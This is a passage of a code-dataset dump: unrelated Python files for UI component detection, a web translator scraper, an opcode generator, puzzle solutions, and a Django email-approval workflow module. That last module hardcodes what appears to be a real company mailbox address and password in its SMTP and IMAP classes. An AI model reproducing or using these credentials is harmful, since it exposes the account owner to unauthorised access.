\nprint(print_scores(rmse_scores))\n\n\n\n","sub_path":"Real Estate ML Project/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"199617838","text":"import cv2\nimport numpy as np\n\nimport ip_draw as draw\nimport ip_preprocessing as pre\nimport ip_detection_utils as util\nimport ocr_classify_text as ocr\nfrom CONFIG import Config\n\nC = Config()\n\n\ndef get_corner(boundaries):\n \"\"\"\n Get the top left and bottom right points of boundary\n :param boundaries: boundary: [top, bottom, left, right]\n -> up, bottom: (column_index, min/max row border)\n -> left, right: (row_index, min/max column border) detect range of each row\n :return: corners: [(top_left, bottom_right)]\n -> top_left: (column_min, row_min)\n -> bottom_right: (column_max, row_max)\n \"\"\"\n corners = []\n for boundary in boundaries:\n top_left = (min(boundary[0][0][0], boundary[1][-1][0]), min(boundary[2][0][0], boundary[3][-1][0]))\n bottom_right = (max(boundary[0][0][0], boundary[1][-1][0]), max(boundary[2][0][0], boundary[3][-1][0]))\n corner = (top_left, bottom_right)\n corners.append(corner)\n return corners\n\n\ndef select_corner(corners, compos_class, class_name):\n \"\"\"\n Select corners in given compo type\n \"\"\"\n corners_wanted = []\n for i in range(len(compos_class)):\n if compos_class[i] == class_name:\n corners_wanted.append(corners[i])\n return corners_wanted\n\n\ndef merge_corner(org, corners, compos_class, is_merge_nested):\n \"\"\"\n i. merge overlapped corners\n ii. remove nested corners\n :param corners: corners: [(top_left, bottom_right)]\n -> top_left: (column_min, row_min)\n -> bottom_right: (column_max, row_max)\n :return: new corners\n \"\"\"\n def merge_overlapped(corner_a, corner_b):\n (top_left_a, bottom_right_a) = corner_a\n (col_min_a, row_min_a) = top_left_a\n (col_max_a, row_max_a) = bottom_right_a\n (top_left_b, bottom_right_b) = corner_b\n (col_min_b, row_min_b) = top_left_b\n (col_max_b, row_max_b) = bottom_right_b\n\n col_min = min(col_min_a, col_min_b)\n col_max = max(col_max_a, col_max_b)\n row_min = min(row_min_a, row_min_b)\n row_max = max(row_max_a, row_max_b)\n return (col_min, row_min), (col_max, row_max)\n\n new_corners = []\n new_class = []\n for i in range(len(corners)):\n is_intersected = False\n for j in range(len(new_corners)):\n r = util.corner_relation_nms(org, corners[i], new_corners[j])\n # r = util.corner_relation(corners[i], new_corners[j])\n if is_merge_nested:\n # if corners[i] is in new_corners[j], ignore corners[i]\n if r == -1:\n is_intersected = True\n break\n # if new_corners[j] is in corners[i], replace new_corners[j] with corners[i]\n elif r == 1:\n is_intersected = True\n new_corners[j] = corners[i]\n new_class[j] = compos_class[i]\n\n # if above IoU threshold, and corners[i] is in new_corners[j], ignore corners[i]\n if r == -2:\n is_intersected = True\n break\n # if above IoU threshold, and new_corners[j] is in corners[i], replace new_corners[j] with corners[i]\n elif r == 2:\n is_intersected = True\n new_corners[j] = corners[i]\n new_class[j] = compos_class[i]\n # if [i] and [j] are overlapped but no containing relation, merge corners with same class\n elif r == 3:\n is_intersected = True\n if compos_class[i] == new_class[j]:\n new_corners[j] = merge_overlapped(corners[i], new_corners[j])\n\n if not is_intersected:\n new_corners.append(corners[i])\n new_class.append(compos_class[i])\n return new_corners, new_class\n\n\ndef strip_img(corners_compo, compos_class, corners_img):\n \"\"\"\n Separate img from other compos\n :return: compos without img\n \"\"\"\n corners_compo_withuot_img = []\n compo_class_withuot_img = []\n for i in range(len(compos_class)):\n if compos_class[i] == 'img':\n corners_img.append(corners_compo[i])\n else:\n corners_compo_withuot_img.append(corners_compo[i])\n compo_class_withuot_img.append(compos_class[i])\n return corners_compo_withuot_img, compo_class_withuot_img\n\n\ndef compo_in_img(processing, org, binary, corners_img,\n corners_block, corners_compo, compos_class):\n \"\"\"\n Detect potential UI components inner img;\n Only leave non-img\n \"\"\"\n corners_img_new = []\n pad = 2\n for corner in corners_img:\n (top_left, bottom_right) = corner\n (col_min, row_min) = top_left\n (col_max, row_max) = bottom_right\n col_min = max(col_min - pad, 0)\n col_max = min(col_max + pad, org.shape[1])\n row_min = max(row_min - pad, 0)\n row_max = min(row_max + pad, org.shape[0])\n height_img = row_max - row_min\n width_img = col_max - col_min\n\n img_area = height_img * width_img\n compo_area = 0\n\n # ignore small ones\n # if height_img <= min_compo_edge_length or width_img <= min_compo_edge_length:\n # continue\n \n clip_org = org[row_min:row_max, col_min:col_max]\n clip_bin = binary[row_min:row_max, col_min:col_max]\n clip_bin = pre.reverse_binary(clip_bin)\n\n corners_block_new, corners_compo_new, compos_class_new = processing(clip_org, clip_bin, main=False)\n corners_block_new = util.corner_cvt_relative_position(corners_block_new, col_min, row_min)\n corners_compo_new = util.corner_cvt_relative_position(corners_compo_new, col_min, row_min)\n\n assert len(corners_compo_new) == len(compos_class_new)\n\n # ignore blocks superposed on its parent img\n for b in corners_block_new:\n (col_min_new, row_min_new), (col_max_new, row_max_new) = b\n height_new = row_max_new - row_min_new\n width_new = col_max_new - col_min_new\n if height_new / height_img < 0.9 and width_new / width_img < 0.9:\n corners_block.append(corners_block_new)\n compo_area += height_new * width_new\n\n # only leave non-img elements\n for i in range(len(corners_compo_new)):\n if compos_class_new[i] != 'img':\n # ignore compos superposed on its parent img\n (col_min_new, row_min_new), (col_max_new, row_max_new) = corners_compo_new[i]\n height_new = row_max_new - row_min_new\n width_new = col_max_new - col_min_new\n\n corners_compo.append(corners_compo_new[i])\n compos_class.append(compos_class_new[i])\n compo_area += height_new * width_new\n\n # ignore imgs full of components\n if compo_area / img_area < 0.5:\n corners_img_new.append(corner)\n\n return corners_block, corners_img_new, corners_compo, compos_class\n\n\ndef block_or_compo(org, binary, corners,\n max_thickness=C.THRESHOLD_BLOCK_MAX_BORDER_THICKNESS, max_block_cross_points=C.THRESHOLD_BLOCK_MAX_CROSS_POINT,\n min_compo_w_h_ratio=C.THRESHOLD_UICOMPO_MIN_W_H_RATIO, max_compo_w_h_ratio=C.THRESHOLD_UICOMPO_MAX_W_H_RATIO,\n min_block_edge=C.THRESHOLD_BLOCK_MIN_EDGE_LENGTH):\n \"\"\"\n Check if the objects are img components or just block\n :param org: Original image\n :param binary: Binary image from pre-processing\n :param corners: [(top_left, bottom_right)]\n -> top_left: (column_min, row_min)\n -> bottom_right: (column_max, row_max)\n :param max_thickness: The max thickness of border of blocks\n :param max_block_cross_points: Ratio of point of interaction\n :return: corners of blocks and imgs\n \"\"\"\n blocks = []\n imgs = []\n compos = []\n for corner in corners:\n (top_left, bottom_right) = corner\n (col_min, row_min) = top_left\n (col_max, row_max) = bottom_right\n height = row_max - row_min\n width = col_max - col_min\n\n block = False\n vacancy = [0, 0, 0, 0]\n for i in range(1, max_thickness):\n try:\n # top to bottom\n if vacancy[0] == 0 and (col_max - col_min - 2 * i) is not 0 and (\n np.sum(binary[row_min + i, col_min + i: col_max - i]) / 255) / (col_max - col_min - 2 * i) <= max_block_cross_points:\n vacancy[0] = 1\n # bottom to top\n if vacancy[1] == 0 and (col_max - col_min - 2 * i) is not 0 and (\n np.sum(binary[row_max - i, col_min + i: col_max - i]) / 255) / (col_max - col_min - 2 * i) <= max_block_cross_points:\n vacancy[1] = 1\n # left to right\n if vacancy[2] == 0 and (row_max - row_min - 2 * i) is not 0 and (\n np.sum(binary[row_min + i: row_max - i, col_min + i]) / 255) / (row_max - row_min - 2 * i) <= max_block_cross_points:\n vacancy[2] = 1\n # right to left\n if vacancy[3] == 0 and (row_max - row_min - 2 * i) is not 0 and (\n np.sum(binary[row_min + i: row_max - i, col_max - i]) / 255) / (row_max - row_min - 2 * i) <= max_block_cross_points:\n vacancy[3] = 1\n if np.sum(vacancy) == 4:\n block = True\n except:\n pass\n\n # too big to be UI components\n if block:\n if height > min_block_edge and width > min_block_edge:\n blocks.append(corner)\n else:\n if min_compo_w_h_ratio < width / height < max_compo_w_h_ratio:\n compos.append(corner)\n # filter out small objects\n else:\n if height > min_block_edge:\n imgs.append(corner)\n # print(height, width)\n else:\n if min_compo_w_h_ratio < width / height < max_compo_w_h_ratio:\n compos.append(corner)\n return blocks, imgs, compos\n\n\ndef compo_irregular(org, corners,\n corners_img, corners_compo, # output\n min_block_edge=C.THRESHOLD_BLOCK_MIN_EDGE_LENGTH,\n min_compo_w_h_ratio=C.THRESHOLD_UICOMPO_MIN_W_H_RATIO, max_compo_w_h_ratio=C.THRESHOLD_UICOMPO_MAX_W_H_RATIO):\n \"\"\"\n Select potential irregular shaped elements by checking the height and width\n Check the edge ratio for img components to avoid text misrecognition\n :param org: Original image\n :param corners: [(top_left, bottom_right)]\n -> top_left: (column_min, row_min)\n -> bottom_right: (column_max, row_max)\n :param min_compo_edge: ignore small objects\n :return: corners of img\n \"\"\"\n for corner in corners:\n (top_left, bottom_right) = corner\n (col_min, row_min) = top_left\n (col_max, row_max) = bottom_right\n height = row_max - row_min\n width = col_max - col_min\n\n # select UI component candidates\n if height > min_block_edge:\n corners_img.append(corner)\n else:\n if min_compo_w_h_ratio < width / height < max_compo_w_h_ratio:\n corners_compo.append(corner)\n\n\ndef img_shrink(org, binary, corners,\n min_line_length_h=C.THRESHOLD_LINE_MIN_LENGTH_H, min_line_length_v=C.THRESHOLD_LINE_MIN_LENGTH_V,\n max_thickness=C.THRESHOLD_LINE_THICKNESS):\n \"\"\"\n For imgs that are part of a block, strip the img\n \"\"\"\n\n corners_shrunken = []\n pad = 2\n for corner in corners:\n (top_left, bottom_right) = corner\n (col_min, row_min) = top_left\n (col_max, row_max) = bottom_right\n\n col_min = max(col_min - pad, 0)\n col_max = min(col_max + pad, org.shape[1])\n row_min = max(row_min - pad, 0)\n row_max = min(row_max + pad, org.shape[0])\n\n clip_bin = binary[row_min:row_max, col_min:col_max]\n clip_org = org[row_min:row_max, col_min:col_max]\n\n # detect lines in the image\n lines_h, lines_v = line_detection(clip_bin, min_line_length_h, min_line_length_v, max_thickness)\n # select those perpendicularly intersect with others at endpoints\n lines_h, lines_v = util.line_check_perpendicular(lines_h, lines_v, max_thickness)\n # convert the position of lines into relative position in the entire image\n lines_h, lines_v = util.line_cvt_relative_position(col_min, row_min, lines_h, lines_v)\n\n # shrink corner according to the lines\n corner_shrunken = util.line_shrink_corners(corner, lines_h, lines_v)\n corners_shrunken.append(corner_shrunken)\n return corners_shrunken\n\n\ndef rm_img_in_compo(corners_img, corners_compo):\n \"\"\"\n Remove imgs in component\n \"\"\"\n corners_img_new = []\n for img in corners_img:\n is_nested = False\n for compo in corners_compo:\n if util.corner_relation(img, compo) == -1:\n is_nested = True\n break\n if not is_nested:\n corners_img_new.append(img)\n return corners_img_new\n\n\n# remove imgs that contain text\ndef rm_text(org, corners, compo_class,\n max_text_height=C.THRESHOLD_TEXT_MAX_HEIGHT, max_text_width=C.THRESHOLD_TEXT_MAX_WIDTH,\n ocr_padding=C.OCR_PADDING, ocr_min_word_area=C.OCR_MIN_WORD_AREA, show=False):\n \"\"\"\n Remove area that full of text\n :param org: original image\n :param corners: [(top_left, bottom_right)]\n -> top_left: (column_min, row_min)\n -> bottom_right: (column_max, row_max)\n :param compo_class: classes of corners\n :param max_text_height: Too large to be text\n :param max_text_width: Too large to be text\n :param ocr_padding: Padding for clipping\n :param ocr_min_word_area: If too text area ratio is too large\n :param show: Show or not\n :return: corners without text objects\n \"\"\"\n new_corners = []\n new_class = []\n for i in range(len(corners)):\n corner = corners[i]\n (top_left, bottom_right) = corner\n (col_min, row_min) = top_left\n (col_max, row_max) = bottom_right\n height = row_max - row_min\n width = col_max - col_min\n # highly likely to be block or img if too large\n if height > max_text_height and width > max_text_width:\n new_corners.append(corner)\n new_class.append(compo_class[i])\n else:\n row_min = row_min - ocr_padding if row_min - ocr_padding >= 0 else 0\n row_max = row_max + ocr_padding if row_max + ocr_padding < org.shape[0] else org.shape[0]\n col_min = col_min - ocr_padding if col_min - ocr_padding >= 0 else 0\n col_max = col_max + ocr_padding if col_max + ocr_padding < org.shape[1] else org.shape[1]\n # check if this area is text\n clip = org[row_min: row_max, col_min: col_max]\n if not ocr.is_text(clip, ocr_min_word_area, show=show):\n new_corners.append(corner)\n new_class.append(compo_class[i])\n return new_corners, new_class\n\n\ndef line_detection(binary,\n min_line_length_h=C.THRESHOLD_LINE_MIN_LENGTH_H, min_line_length_v=C.THRESHOLD_LINE_MIN_LENGTH_V,\n max_thickness=C.THRESHOLD_LINE_THICKNESS):\n \"\"\"\n Detect lines\n :param binary: Binary image from pre-processing\n :param min_line_length_h: Min length for horizontal lines\n :param min_line_length_v: Min length for vertical lines\n :param max_thickness\n :return: lines: [line_h, line_v]\n -> line_h: horizontal {'head':(column_min, row), 'end':(column_max, row), 'thickness':int)\n -> line_v: vertical {'head':(column, row_min), 'end':(column, row_max), 'thickness':int}\n \"\"\"\n def no_neighbor(start_row, start_col, mode, line=None):\n \"\"\"\n check this point has adjacent points in orthogonal direction\n \"\"\"\n if mode == 'h':\n for t in range(max_thickness + 1):\n if start_row + t >= binary.shape[0] or binary[start_row + t, start_col] == 0:\n # if not start point, update the thickness of this line\n if line is not None:\n line['thickness'] = max(line['thickness'], t)\n return True\n mark_h[start_row + t, start_col] = 255\n return False\n elif mode == 'v':\n for t in range(max_thickness + 1):\n if start_col + t >= binary.shape[1] or binary[start_row, start_col + t] == 0:\n # if not start point, update the thickness of this line\n if line is not None:\n line['thickness'] = max(line['thickness'], t)\n return True\n mark_v[start_row, start_col + t] = 255\n return False\n\n row, column = binary.shape[0], binary.shape[1]\n mark_h = np.zeros(binary.shape, dtype=np.uint8)\n mark_v = np.zeros(binary.shape, dtype=np.uint8)\n lines_h = []\n lines_v = []\n x, y = 0, 0\n while x < row - 1 or y < column - 1:\n # horizontal\n new_line = False\n head, end = None, None\n line = {}\n for j in range(column):\n # line start\n if not new_line and mark_h[x][j] == 0 and binary[x][j] > 0 and no_neighbor(x, j, 'h'):\n head = j\n new_line = True\n line['head'] = [head, x]\n line['thickness'] = -1\n # line end\n elif new_line and (j == column - 1 or mark_h[x][j] > 0 or binary[x][j] == 0 or not no_neighbor(x, j, 'h', line)):\n end = j\n new_line = False\n if end - head > min_line_length_h:\n line['end'] = [end, x]\n lines_h.append(line)\n line = {}\n\n # vertical\n new_line = False\n head, end = None, None\n line = {}\n for i in range(row):\n # line start\n if not new_line and mark_v[i][y] == 0 and binary[i][y] > 0 and no_neighbor(i, y, 'v'):\n head = i\n new_line = True\n line['head'] = [y, head]\n line['thickness'] = 0\n # line end\n elif new_line and (i == row - 1 or mark_v[i][y] > 0 or binary[i][y] == 0 or not no_neighbor(i, y, 'v', line)):\n end = i\n new_line = False\n if end - head > min_line_length_v:\n line['end'] = [y, end]\n lines_v.append(line)\n line = {}\n\n if x < row - 1:\n x += 1\n if y < column - 1:\n y += 1\n return lines_h, lines_v\n\n\n# take the binary image as input\n# calculate the connected regions -> get the bounding boundaries of them -> check if those regions are rectangles\n# return all boundaries and boundaries of rectangles\ndef boundary_detection(binary,\n min_obj_area=C.THRESHOLD_OBJ_MIN_AREA, min_obj_perimeter=C.THRESHOLD_OBJ_MIN_PERIMETER,\n line_thickness=C.THRESHOLD_LINE_THICKNESS, min_rec_evenness=C.THRESHOLD_REC_MIN_EVENNESS,\n max_dent_ratio=C.THRESHOLD_REC_MAX_DENT_RATIO, show=False):\n \"\"\"\n :param binary: Binary image from pre-processing\n :param min_obj_area: If not pass then ignore the small object\n :param min_obj_perimeter: If not pass then ignore the small object\n :param line_thickness: If not pass then ignore the slim object\n :param min_rec_evenness: If not pass then this object cannot be rectangular\n :param max_dent_ratio: If not pass then this object cannot be rectangular\n :return: boundary: [top, bottom, left, right]\n -> up, bottom: (column_index, min/max row border)\n -> left, right: (row_index, min/max column border) detect range of each row\n \"\"\"\n mark = np.full(binary.shape, 0, dtype=np.uint8)\n boundary_all = []\n boundary_rec = []\n boundary_nonrec = []\n row, column = binary.shape[0], binary.shape[1]\n\n for i in range(row):\n for j in range(column):\n if binary[i, j] == 255 and mark[i, j] == 0:\n # get connected area\n area = util.boundary_bfs_connected_area(binary, i, j, mark)\n # ignore small area\n if len(area) < min_obj_area:\n continue\n\n # calculate the boundary of the connected area\n boundary = util.boundary_get_boundary(area)\n # ignore small area\n perimeter = np.sum([len(b) for b in boundary])\n if perimeter < min_obj_perimeter:\n continue\n\n # check if it is line by checking the length of edges\n if util.boundary_is_line(boundary, line_thickness):\n continue\n\n # rectangle check\n if util.boundary_is_rectangle(boundary, min_rec_evenness, max_dent_ratio):\n boundary_rec.append(boundary)\n else:\n boundary_nonrec.append(boundary)\n\n if show:\n print('Area:%d, Perimeter:%d' % (len(area), perimeter))\n boundary_all.append(boundary)\n draw.draw_boundary(boundary_all, binary.shape, show=True)\n\n return boundary_rec, boundary_nonrec\n","sub_path":"code/PROJECT/integration-v2/lib/ip_detection.py","file_name":"ip_detection.py","file_ext":"py","file_size_in_byte":21616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"27860905","text":"# -*- coding: utf-8 -*-\nimport requests\nimport sys\n\n\nfrom bs4 import BeautifulSoup\n\nsupporting_languages = {\"1\": \"Arabic\",\n \"2\": \"German\",\n \"3\": \"English\",\n \"4\": \"Spanish\",\n \"5\": \"French\",\n \"6\": \"Hebrew\",\n \"7\": \"Japanese\",\n \"8\": \"Dutch\",\n \"9\": \"Polish\",\n \"10\": \"Portuguese\",\n \"11\": \"Romanian\",\n \"12\": \"Russian\",\n \"13\": \"Turkish\"}\nsupporting_languages_tags = {\"1\": \"rtl arabic\",\n \"6\": \"rtl\"}\n\ngreeting = \"Hello, you're welcome to the translator.\\nTranslator supports:\\n\" \\\n + \"\\n\".join([key + '.' + value for key, value in supporting_languages.items()])\nif sys.argv[1:4]:\n from_language = {value.lower(): key for key, value in supporting_languages.items()}[sys.argv[1]]\n to_language = \"0\" if sys.argv[2] == \"all\" else\\\n {value.lower(): key for key, value in supporting_languages.items()}[sys.argv[2]]\n word_to_translate = sys.argv[3]\nelse:\n print(greeting)\n from_language = input(\"Type the number of your language: \")\n to_language = input(\"Type the number of a language you want to translate to or '0' to translate to all languages:\")\n word_to_translate = input(\"Type the word you want to translate: \")\n\n\ndef to_file_and_terminal(func):\n def wrapper(*args):\n out = func(*args)\n file.write(out)\n print(out, end=\"\")\n return wrapper\n\n\n@to_file_and_terminal\ndef translate(from_lang, to_lang, word):\n link = r\"https://context.reverso.net/translation/\" \\\n + supporting_languages[from_lang].lower() + \"-\" \\\n + supporting_languages[to_lang].lower() + \"/\" + word\n\n r = requests.get(link, headers={'User-Agent': 'Mozilla/5.0'})\n\n soup = BeautifulSoup(r.content, \"html.parser\")\n\n div = soup.find_all('div', {'id': \"translations-content\"})\n foreign_words = [word.strip() for word in div[0].text.split()]\n\n class_src = f\"src {supporting_languages_tags.get(from_lang, 'ltr')}\"\n class_trg = f\"trg {supporting_languages_tags.get(to_lang, 'ltr')}\"\n\n div_src = soup.find_all('div', {'class': class_src})\n div_trg = soup.find_all('div', {'class': class_trg})\n quotes = list(zip([tag.text.strip() for tag in div_src], [tag.text.strip() for tag in div_trg]))\n return f\"{supporting_languages[to_lang]} Translations:\" \\\n + \"\\n\" + str(foreign_words[0]) + \"\\n\\n\" \\\n + f\"{supporting_languages[to_lang]} Examples:\"\\\n + \"\\n\" + quotes[0][0] + \":\\n\" + quotes[0][1] + \"\\n\\n\"\n\n\nwith open(f\"{word_to_translate}.txt\", \"a+\", encoding=\"utf-8\") as file:\n if to_language == \"0\":\n for language in supporting_languages:\n if language != from_language:\n translate(from_language, language, word_to_translate)\n else:\n translate(from_language, to_language, word_to_translate)\n","sub_path":"Hard-Level/Multilingual Online Translator/Stage 6 Faster translation/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"404635024","text":"\ndef read_opcodes(path_rsc):\n \"\"\" Read opcode from resource file \"\"\"\n with open(path_rsc + \"opcodes.txt\", \"r\") as file:\n text = file.read()\n text = text.replace(\".u8\", \"DUMMY\")\n text = text.replace(\"u8\", \"UINT8\")\n text = text.replace(\"i8\", \"INT8\")\n text = text.replace(\"u16\", \"UINT16\")\n text = text.replace(\"i16\", \"INT16\")\n text = text.replace(\"u32\", \"UINT32\")\n text = text.replace(\"i32\", \"INT32\")\n text = text.replace(\"var\", \"VAR\")\n lines = list(filter(None, text.split(\"\\n\")))\n \n opcodes = [None]*256\n for line in lines:\n l = line.split()\n n = int(l[0][2:], 16)\n if l[1] != \"_uns\":\n opcodes[n] = (l[1], l[2:])\n else:\n opcodes[n] = (\"invalid\", [])\n \n return opcodes\n\n\ndef generate_warning():\n \"\"\" Create warning fot auto-generated files \"\"\"\n return \"/* Auto-generated file, DO NOT MODIFY */\\n\\n\"\n\n\ndef generate_enum(opcodes):\n \"\"\" Create enum from opcodes \"\"\"\n enum = [opcode[0] for opcode in opcodes if opcode[0]!=\"invalid\"]\n enum.append(\"invalid\")\n \n s = \" \"\n for k, e in enumerate(enum):\n s += e.upper() + \", \"\n if k%8 == 7:\n s += \"\\n \"\n s += \"\\n\"\n \n return s\n\n\ndef generate_enum_strings(opcodes):\n \"\"\" Create enum strings from opcodes \"\"\"\n enum = [opcode[0] for opcode in opcodes if opcode[0]!=\"invalid\"]\n enum.append(\"invalid\")\n \n s = \" \"\n for k, e in enumerate(enum):\n s += \"\\\"\" + e + \"\\\", \"\n if k%8 == 7:\n s += \"\\n \"\n s += \"\\n\"\n \n return s\n\n\ndef generate_table(opcodes):\n \"\"\" Create table from opcodes \"\"\"\n s = \"\"\n for opcode in opcodes:\n s += \" {{{}, {{{}}}}},\\n\".format(opcode[0].upper(), \",\".join([\"Operand::\" + op for op in opcode[1]]))\n return s\n \n\ndef write_mnemonic_enum(path_src, opcodes):\n \"\"\" Write mnemonic.cpp and mnemonic.hpp \"\"\"\n s = generate_warning()\n s += \"#pragma once\\n\\n\"\n s += \"#include \\n\\n\\n\"\n s += \"enum Mnemonic\\n\"\n s += \"{\\n\"\n s += generate_enum(opcodes) + \"\\n\"\n s += \"};\\n\\n\"\n s += \"std::string mnemonicStr(Mnemonic mnemonic);\\n\"\n \n with open(path_src + \"mnemonic.hpp\", 'w') as file:\n file.write(s)\n \n\n s = generate_warning()\n s += \"#include \\\"mnemonic.hpp\\\"\\n\\n\\n\"\n s += \"std::string mnemonicStr(Mnemonic mnemonic)\\n\"\n s += \"{\\n\"\n s += \" static std::string names[] = {\\n\"\n s += generate_enum_strings(opcodes);\n s += \" };\\n\\n\"\n s += \" return names[(int)mnemonic];\\n\" \n s += \"}\\n\"\n \n with open(path_src + \"mnemonic.cpp\", 'w') as file:\n file.write(s)\n \n\ndef write_opcode_table(path_src, opcodes):\n \"\"\" Write opcode.hpp \"\"\"\n s = generate_warning()\n s += \"#include \\\"opcode.hpp\\\"\\n\\n\\n\"\n s += \"Opcode Opcode::table[256] = {\\n\"\n s += generate_table(opcodes) + \"\\n\"\n s += \"};\\n\\n\"\n s += \"std::string mnemonicStr(Mnemonic mnemonic);\\n\"\n \n with open(path_src + \"opcode.cpp\", 'w') as file:\n file.write(s)\n \n \n \nif __name__=='__main__':\n \"\"\" Main \"\"\"\n path_rsc = \"./\"\n path_src = \"../src/decoder/\"\n \n opcodes = read_opcodes(path_rsc)\n \n write_mnemonic_enum(path_src, opcodes)\n write_opcode_table(path_src, opcodes)","sub_path":"rsc/generate-opcodes.py","file_name":"generate-opcodes.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"540163156","text":"# collected\n# @lc app=leetcode id=2 lang=python\n#\n# [2] Add Two Numbers\n#\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def addTwoNumbers(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n # list is reversed\n\n dummy = ptr = ListNode(-1)\n carry = 0\n while carry or l1 or l2:\n l1_val, l2_val = 0, 0\n\n if l1: \n l1_val = l1.val\n l1 = l1.next\n if l2: \n l2_val = l2.val\n l2 = l2.next\n \n new_val, carry = self.add(l1_val, l2_val, carry)\n new_node = ListNode(new_val)\n ptr.next = new_node\n ptr = ptr.next \n \n return dummy.next\n\n def add(self, num1, num2, carry):\n res = num1 + num2 + carry\n return (res % 10, 1) if res > 9 else (res, 0)\n\n\n","sub_path":"2.add-two-numbers.py","file_name":"2.add-two-numbers.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"86230718","text":"#!/bin/env python3\n\nimport functools as ft\n\n\"\"\" \n https://projecteuler.net/problem=8\n \n TBD: \n list_ints() to be parameter in miltiplied13; \n multiplied13 to be parameter in find_max\n\"\"\"\n\n\n# create list of ints\ndef list_ints():\n \"\"\"\n Convert text file to array of ints\n \"\"\"\n list1000 = []\n with open('./textfiles/digits1000_8.txt') as f:\n list1000 = f.read().replace('\\n', '')\n return [int(x) for x in list1000]\n\n\ndef multiplied13():\n \"\"\"\n Multiply every 13 consecutive values of array\n \"\"\"\n list1000 = list_ints()\n multiplied_list = []\n for i, j in enumerate(list1000):\n # multiply evey 13 ints\n multiplied_list.append(ft.reduce(lambda x, y: x * y, list1000[i:i+13]))\n return multiplied_list\n\ndef find_max():\n \"\"\"\n find the max value\n \"\"\"\n the_sum = multiplied13()\n return max(the_sum)\n\n\n\nif __name__ == '__main__':\n print(find_max())\n","sub_path":"project_euler/008.py","file_name":"008.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"319414281","text":"# -*- encoding: utf-8 -*-\n\n\"\"\" 发送邮件给相应的流程负责人\n 如果可以的话,可以集成到cmdb的流程中\n\"\"\"\n\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\nimport imapy\nfrom imapy.query_builder import Q\n\nimport re\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"cmdb.settings\")\n\nimport django\ndjango.setup()\n\nfrom myworkflows.models import WorkflowStateEvent\nfrom myworkflows.utils import do_transition, get_state_user, make_email_notify\n\n\nfrom django.contrib.auth.models import User\n\nfrom cmdb.logs import MailLog\n\nml = MailLog()\n\nfrom django.db import connections\n\n\ndef close_old_connections():\n for conn in connections.all():\n conn.close_if_unusable_or_obsolete()\n\n\nclass SendEmail(object):\n\n def __init__(self, to_list, subject, content):\n self._host = 'smtp.exmail.qq.com'\n self._port = 465\n self._user = 'devopsteam@forcegames.cn'\n self._passwd = 'Khgey@520199'\n self.to_list = to_list\n self.subject = subject\n self.content = content\n\n def send(self):\n '发送邮件'\n try:\n print(self.to_list)\n server = smtplib.SMTP_SSL(self._host, self._port)\n server.login(self._user, self._passwd)\n server.sendmail(\"<%s>\" % self._user, self.to_list, self.get_attach())\n print('send mail to %s ok' % (','.join(self.to_list)))\n ml.logger.info('%s: send mail to %s ok' % (self.subject, ','.join(self.to_list)))\n except Exception as e:\n print(e)\n ml.logger.error('%s: send mail failed' % (self.subject))\n finally:\n server.close()\n\n def get_attach(self):\n '构造邮件内容'\n attach = MIMEMultipart()\n txt = MIMEText(self.content, 'html', 'utf-8')\n attach.attach(txt)\n\n # 主题,最上面的一行\n attach[\"Subject\"] = self.subject\n\n # 显示在发件人\n attach[\"From\"] = \"DevOps Team<%s>\" % self._user\n\n # 收件人列表\n attach[\"To\"] = \";\".join(self.to_list)\n\n return attach.as_string()\n\n\nclass RecieveMail(object):\n \"\"\"收取邮件,根据匹配subject来执行审批\n \"\"\"\n\n def __init__(self):\n\n self._host = 'imap.exmail.qq.com'\n self._port = 993\n self._username = 'devopsteam@forcegames.cn'\n self._password = 'Khgey@520199'\n\n def recieve_unseen(self, count=5):\n '收取未读的邮箱,这里默认每次只收取5个'\n\n box = imapy.connect(\n host=self._host,\n port=self._port,\n username=self._username,\n password=self._password,\n ssl=True,\n )\n\n q = Q()\n\n emails = box.folder('INBOX').emails(\n q.unseen()\n )[0:count]\n\n emails = list(reversed(emails))\n\n p = re.compile(r'.*#工单流程')\n\n for mail in emails:\n try:\n # 重新连接数据库\n close_old_connections()\n\n subject = mail['subject']\n from_email = mail['from_email']\n user = User.objects.get(email=from_email)\n username = user.username\n # 如果匹配到的是工单流程的主题的邮件,则需要处理\n # 如果不是,这里就标记为已读\n if p.match(subject):\n user = User.objects.get(username=username)\n wse = subject.split(\"#\")[3].split('=')[1] # 'Re:#工单流程#剑雨后端SVN申请#wse=92' ==> 92\n wse = WorkflowStateEvent.objects.get(id=int(wse))\n reply = mail['text'][0]['text']\n if reply.startswith('yes'):\n transition = wse.state.transition.get(condition='同意')\n ml.logger.info('%s: %s: 同意处理' % (subject, username))\n\n msg, success, new_wse = do_transition(wse, transition, user)\n\n to_list = [\n x.email for x in get_state_user(transition.destination, obj=new_wse.content_object) if x.email\n ]\n\n if to_list:\n subject, content = make_email_notify(True)\n send_mail.delay(to_list, subject, content)\n ml.logger.info('%s: %s: 处理结果:%s %s' % (subject, username, msg, success))\n elif reply.startswith('no'):\n transition = wse.state.transition.get(condition='拒绝')\n ml.logger.info('%s: %s: 拒绝处理' % (subject, username))\n msg, success, new_wse = do_transition(wse, transition, user)\n\n to_list = [new_wse.creator.email]\n subject, content = make_email_notify(False)\n send_mail.delay(to_list, subject, content)\n\n ml.logger.info('%s: %s: 处理结果:%s %s' % (subject, username, msg, success))\n else:\n ml.logger.warn('%s: %s: 没有匹配到指令' % (subject, username))\n else:\n ml.logger.warn('%s: %s: 没有匹配到主题' % (subject, username))\n 